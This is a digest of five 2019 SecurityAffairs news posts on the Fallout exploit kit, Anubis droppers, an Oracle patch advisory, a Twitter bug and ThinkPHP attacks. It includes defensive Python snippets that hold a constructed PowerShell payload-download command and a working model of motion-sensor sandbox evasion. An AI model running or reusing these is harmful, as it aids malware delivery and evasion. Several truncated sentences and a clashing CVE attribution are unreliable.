Fallout Exploit Kit now includes exploit for CVE-2018-15982 Flash zero-day

Posted: 18 Jan 2019 03:22 PM PST

Experts at Malwarebytes have reported that the code for the recently discovered Flash zero-day flaw was added to the Fallout Exploit kit.

Experts at Malwarebytes observed a new version of the Fallout Exploit kit that includes the code to exploit a recently discovered Flash zero-day vulnerability.

The Fallout Exploit kit was discovered at the end of August by the threat analyst nao_sec; at the time it was used to distribute the GandCrab ransomware and other malicious code, including droppers and potentially unwanted programs (PUPs).

First detailed in September 2018, the toolkit was observed delivering malware families ranging from ransomware to backdoors, but also fingerprinting the browser profile to identify targets of interest.

The activity associated with the Fallout exploit kit was temporarily suspended in early January, likely to improve it; in the same period experts at Malwarebytes observed an increase in RIG EK activity.

The Fallout EK was distributed mainly via malvertising chains; starting January 15 it was used to deliver the GandCrab ransomware.

“After a short hiatus in early January, the Fallout exploit kit is back in business again with some new features for the new year.” reads the post published by Malwarebytes.

“The revised Fallout EK boasts several new features, including integration of the most recent Flash Player exploit. Security researcher Kafeine identified that Fallout is now the second exploit kit to add CVE-2018-15982.”

One of the most important improvements for the Fallout Exploit kit is the exploit for a recently discovered Adobe Flash Player zero-day tracked as

The CVE-2018-15982 flaw is a critical use-after-free bug that was exploited by an advanced persistent threat actor in attacks aimed at a healthcare organization associated with the Russian presidential administration.

The flaw could be exploited by attackers to execute arbitrary code; Adobe addressed it with the release of Flash Player for Windows, macOS, Linux, and Chrome OS.

The first exploit kit that integrated the code to trigger the CVE-2018-15982 flaw in mid-December was Underminer.

The new Fallout Exploit kit adds HTTPS support and a new landing page format, and uses PowerShell to run the final payload.


“The Base64 encoded Powershell command calls out the payload URL and loads it in its own way,” continues the analysis. “This technique is most likely an attempt at evasion, as traditionally we'd expect the Internet Explorer process to drop the payload.”
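The detection angle on the behaviour quoted above, as an added example that is not Malwarebytes' or the exploit kit's code: triage of Windows process-creation records for a browser process launching PowerShell with a Base64-encoded command, decoding that command and pulling out the URL it calls. The records, the flag names and the payload URL are constructed placeholders.

```python
import base64
import re

# PowerShell's -EncodedCommand (aliases -e, -ec, -enc) carries the script text
# as Base64 of UTF-16LE, so decoding it is enough to read the command.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s'"]+""", re.IGNORECASE)
BROWSER_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

def decode_encoded_command(b64):
    """Turn an -EncodedCommand argument back into readable script text."""
    return base64.b64decode(b64).decode("utf-16-le")

def triage(event):
    """Return a finding for browser-spawned PowerShell with an encoded command, else None."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL or parent not in BROWSER_PARENTS:
        return None
    match = ENCODED_FLAG.search(event["command_line"])
    if not match:
        return None
    try:
        script = decode_encoded_command(match.group(1))
    except (ValueError, UnicodeDecodeError):
        script = "<undecodable>"
    return {"parent": parent, "script": script, "urls": URL_RE.findall(script)}

def _encoded(script):
    # Only used to build the constructed sample below.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample records in the shape of Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Date"},
    {"parent_image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _encoded(
         "Invoke-WebRequest 'http://payload.example/stage2' -OutFile $env:TEMP\\s.exe")},
]

def findings(events=SAMPLE_EVENTS):
    """All suspicious records from a batch of process-creation events."""
    return [f for f in (triage(e) for e in events) if f]

if __name__ == "__main__":
    for f in findings():
        print(f"{f['parent']} spawned PowerShell with encoded command calling {f['urls']}")
```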

The new development for the Fallout Exploit kit demonstrates the malware developers continuously monitor

This development is the proof that exploit kit developers are continuously improving their code to trigger the most recent flaws.

Pierluigi Paganini

(SecurityAffairs – Fallout Exploit kit, cybercrime)

The post Fallout Exploit Kit now includes exploit for CVE-2018-15982 Flash zero-day appeared first on Security Affairs.

Android apps use the motion sensor to evade detection and deliver Anubis malware

Posted: 18 Jan 2019 10:37 AM PST

Security experts from Trend Micro have recently spotted two Android apps that use the motion sensor to evade detection and spread the Anubis banking Trojan.

Malware authors continue to improve their malicious apps to avoid detection and infect the largest number of users.

Security experts from Trend Micro have recently spotted two Android apps in the Google Play Store, Currency Converter and BatterySaverMobi, that infected thousands of users with banking malware.


Currency Converter masquerades as a currency exchange app and BatterySaverMobi as a battery saver app; both use the motion sensors of infected Android devices to evade detection. The sensor readings are checked before the banking Trojan dubbed Anubis is installed.

With this trick, vxers attempt to avoid detection because the malicious code checks for motion sensor data, which the emulators used by researchers to analyze the malware typically do not produce.

“We looked into this campaign and found that the apps dropped a malicious payload that we can safely link to the known banking malware Anubis (detected by Trend Micro as ANDROIDOS_ANUBISDROPPER).” “These apps don't just use traditional evasion techniques; they also try to use the user and device's motions to hide their activities.” reads the analysis published by Trend Micro.

“As a user moves, their device usually generates some amount of motion sensor data. The malware developer is assuming that the sandbox for scanning malware is an emulator with no motion sensors, and as such will not create that type of data. If that is the case, the developer can determine if the app is running in a sandbox environment by simply checking for sensor data.”

The infection process does not start if, from the sensor data, the malware determines that the device (and therefore the user) is still.

If the app detects sensor data, it runs the malicious code and then tries to trick the victim into downloading and installing the Anubis payload APK through a fake system update, masquerading it as a “stable version of Android.”
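A model of the sandbox check described above and of the sandbox-side mitigation it implies, as an added example that is not Trend Micro's analysis code nor the dropper's: the gating decision is assumed to be "no motion, stay dormant", and the sample count, the variance threshold and the synthetic readings are assumptions, not values taken from the malware.

```python
import math
import random

def motion_detected(samples, min_samples=20, min_stddev=0.05):
    """Decide whether accelerometer readings look like a real, moving device.

    samples: list of (x, y, z) readings in m/s^2; an empty list stands for a
    device that reports no motion sensor at all (the typical emulator case).
    Threshold and minimum sample count are assumed values."""
    if len(samples) < min_samples:
        return False
    magnitudes = [math.sqrt(x * x + y * y + z * z) for x, y, z in samples]
    mean = sum(magnitudes) / len(magnitudes)
    variance = sum((m - mean) ** 2 for m in magnitudes) / len(magnitudes)
    return math.sqrt(variance) >= min_stddev

def dropper_would_activate(samples):
    """The assumed gating decision: run the dropper only when motion is seen."""
    return motion_detected(samples)

def synthetic_handheld_stream(n=100, seed=1):
    """Sandbox mitigation: fabricate readings of a phone held in a hand.

    Gravity (~9.81 m/s^2) on one axis, a slow sway and small jitter on all
    three axes; constant or absent readings are what give an emulator away."""
    rng = random.Random(seed)
    out = []
    for i in range(n):
        sway = 0.3 * math.sin(i / 7.0)
        out.append((rng.gauss(0.0, 0.08) + sway,
                    rng.gauss(0.0, 0.08),
                    9.81 + rng.gauss(0.0, 0.12)))
    return out

EMULATOR_NO_SENSOR = []                    # constructed: sensor absent
EMULATOR_FLAT = [(0.0, 0.0, 9.81)] * 100   # constructed: sensor present, never changes

if __name__ == "__main__":
    cases = [("no sensor", EMULATOR_NO_SENSOR), ("flat sensor", EMULATOR_FLAT),
             ("synthetic handheld", synthetic_handheld_stream())]
    for name, stream in cases:
        state = "activates" if dropper_would_activate(stream) else "stays dormant"
        print(f"{name:18s}: dropper {state}")
```

An analysis emulator that only exposes a sensor with a fixed value is still caught by the variance check, so the injected stream has to vary over time, not merely exist.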

If the user accepts the bogus system update, the dropper uses requests and responses over legitimate services such as Twitter and Telegram, downloads the Anubis banking Trojan from the C2, and installs it.

“Then, it registers with the C&C server and checks for commands with an HTTP POST request. If the server responds to the app with an APK command and attaches the download URL, then the Anubis payload will be dropped in the background.” continues the analysis.

Experts pointed out that the Anubis banking Trojan uses a built-in keylogger to steal credentials and can also take screenshots of the user's screen while credentials are being entered into any banking app.

Experts observed infections in 93 different countries; the latest variant of the Anubis banking Trojan targets at least 377 variations of financial apps.

The banking Trojan is also able to access contact lists and location, send spam messages to contacts, call numbers from the device, record audio, and alter external storage.

Further details on the malware, including IoCs, are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – Anubis banking Trojan, motion sensor)


Oracle critical patch advisory addresses 284 flaws, 33 critical

Posted: 18 Jan 2019 05:15 AM PST

Oracle released the first critical patch advisory for 2019, which addresses a total of 284 vulnerabilities, 33 of them rated "critical".

Let’s take a closer look at some of the vulnerabilities fixed by this patch advisory.

The advisory fixed the CVE-2016-1000031 flaw, a remote code execution (RCE) bug in Apache Commons FileUpload disclosed in November last year. The Commons FileUpload library is the default file upload mechanism in Struts 2; CVE-2016-1000031 was discovered two years ago by experts at Tenable.

The bug affected the OCA’s Diameter Signalling Router component and its Communications Services Gatekeeper. The flaw also affected the Financial Services Analytical Applications Infrastructure, the Fusion Middleware MapViewer, and four three Oracle Retail components.

A vulnerability in Apache Log4j tracked as CVE-2017-5645 impacted Oracle’s Converged Application Server – Service Controller, the OCA Online Mediation Controller Service Broker, the WebRTC Session Controller, the FLEXCUBE component in Oracle Financial Services Applications, the Fusion GoldenGate app adapters and SOA Suite, and also a Sun tape library component.

The CVE-2017-5645 flaw resides in the Codehaus versions of Groovy and affected OCA Unified Inventory Management.

The critical patch advisory for 2019 also fixed the CVE-2018-11776 vulnerability in the OCA’s Communications Policy Management component; this issue was exploited in 2018 by threat actors to mine cryptocurrency.

Oracle also addressed an arbitrary file upload flaw (CVE-2018-9206) in the OCA’s Services Gatekeeper that also impacted Primavera P6 in the Construction and Engineering Suite, and Siebel CRM.

Another bug fixed by Big Red, CVE-2019-2453, affected the Oracle E-Business Performance Management component:

“Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Performance Management.” reads the description provided by

“Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Performance Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Performance Management accessible data.”

Oracle also addressed CVE-2016-4000, a flaw in Jython that provided a vector for arbitrary code execution; Jython is used by the Oracle Enterprise Manager platform, Banking Platform, and Utilities Network Management System.

The list is very long; it also includes patches for a DoS in the Apache Derby tool used in the WebLogic server (CVE-2015-1832) and an RCE bug in the Spring framework used by Oracle Tuxedo and the Sun Tape Library ACSLS component.

People interested in the full list could visit the following address:


Pierluigi Paganini

(SecurityAffairs – hacking, critical patch advisory)


Twitter fixed a bug in its Android App that exposed Protected Tweets

Posted: 18 Jan 2019 01:49 AM PST

A bug in the Twitter app for Android may have exposed protected tweets, the social media platform revealed on Thursday.

The bug in the Android Twitter app affects the "Protect my Tweets" option in the account's "Privacy and safety" settings, which restricts viewing of the user’s posts to approved followers.

People who used the Twitter app for Android may have had the protected tweets setting disabled after they made some changes to account settings, for example after a change to the email address associated with the profile.

“We’ve become aware of an issue in Twitter for Android that disabled the “Protect your Tweets” setting if certain account changes were made.” reads the security advisory published by the company.

“You may have been impacted by this issue if you had protected Tweets turned on in your settings, used Twitter for Android, and made certain changes to account settings such as changing the email address associated with your account between November 3, 2014, and January 14, 2019.”

The vulnerability was introduced on November 3, 2014, and was fixed on January 14, 2019; users of the iOS app or the web version were not impacted.

Twitter has notified impacted users and has turned “Protect your Tweets” back on for them if it was disabled.

"We are providing this broader notice through the Twitter Help Center since we can't confirm every account that may have been impacted. We encourage you to review your privacy settings to ensure that your 'Protect your Tweets' setting reflects your preferences," continues the advisory.

Recently Twitter addressed a similar bug: in December the researcher Terence Eden discovered that the permissions dialog shown when authorizing certain apps to access Twitter could expose direct messages to the third party.

In September 2018, the company announced that an issue in the Twitter Account Activity API had exposed some users' direct messages (DMs) and protected tweets to the wrong developers.

Twitter is considered one of the most powerful social media platforms; it has been used in multiple cases by nation-state actors as a vector for disinformation and propaganda.

In December Twitter discovered a possible nation-state attack while it was investigating an information disclosure flaw affecting its platform.

Pierluigi Paganini

(SecurityAffairs – Twitter app, Android)


Attacks in the wild leverage flaw in ThinkPHP Framework

Posted: 17 Jan 2019 11:58 PM PST

Threat actors in the wild are leveraging a recently discovered flaw in the ThinkPHP PHP framework to install cryptominers, skimmers, and other malware.

Multiple threat actors are leveraging a recently discovered code execution vulnerability (CVE-2018-20062) in the ThinkPHP framework.

The flaw was already addressed by the Chinese firm TopThink that designed the framework, but security expert Larry Cashdollar at Akamai’s Security Incident Response Team has now discovered active exploits of the flaw in the wild.

Cashdollar was investigating a recent Magecart campaign when he discovered a new strain of malware.

“While investigating the recent Magecart card skimming attacks, I came across a payload I was not familiar with. Further research into it led me to discover that in December a researcher disclosed a remote command execution vulnerability in ThinkPHP, a web framework by TopThink.” reads the analysis published by the expert.

“The developers fixed the vulnerability stating that because “the framework does not detect the controller name enough, it may lead to possible ‘getshell’ vulnerabilities without the forced routing enabled.””

According to Cashdollar, multiple attackers are using relatively simple techniques to trigger the issue; a single line of code is enough to scan for the flaw.

Once the flaw is found, attackers can use publicly available code to exploit it and install a variety of malware. Cashdollar said that in one case threat actors exploited the flaw to deliver a variant of the Mirai bot.

“There are multiple actors abusing this flaw to install everything from a Mirai-like botnet to Microsoft Windows malware.” continues the post.

Analysis of samples from the last 7 days revealed that the majority of source IP addresses are in the Asia Pacific region, where the ThinkPHP framework is most popular.


Cashdollar confirmed that threat actors are actively scanning systems across the world.

To secure your system, update the framework to the current version.

“There is so much attack traffic, and so many ways to hide, criminals no longer worry about the tracks they’ve left behind. The goal now is to get command execution as any user, on any type of system, to either spread a botnet, distribute malware, or mine cryptocurrency.” concludes the expert.

“We will see more cross-pollination of command execution vulnerabilities in web apps, enterprise software, and IoT devices being used against multiple target platforms.”

Pierluigi Paganini

(SecurityAffairs – hacking, ThinkPHP)
